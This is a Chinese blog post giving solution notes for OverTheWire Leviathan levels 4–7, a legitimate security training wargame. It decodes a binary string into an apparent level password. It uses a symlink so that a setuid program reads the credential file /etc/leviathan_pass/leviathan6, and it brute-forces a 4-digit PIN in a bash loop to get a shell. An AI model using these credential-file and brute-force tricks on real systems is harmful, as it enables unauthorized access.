标签:overthewire linux命令 leviathan
level 4:二进制转ascii,python脚本
.trash/bin #出现一串二进制
import sys
a = "01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010"
for i in a.split(‘ ‘):
sys.stdout.write(chr(int(i,2)))
level 5:符号链接,ln命令
./leviathan5 #提示Cannot find /tmp/file.log
ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
./leviathan5
level 6:brute-forcing
#题目要求带4-digital为参数运行程序,如果密码正确,会给出shell。
#有点类似bandit24,新增加的那个,但更简单一些。
#!/bin/bash
for i in {0000..9999}
do
~/leviathan6 $i
done
level 7:touch the end now
本文出自 “万物皆刍狗” 博客,请务必保留此出处http://cugou.blog.51cto.com/9637775/1582675
标签:overthewire linux命令 leviathan
原文地址:http://cugou.blog.51cto.com/9637775/1582675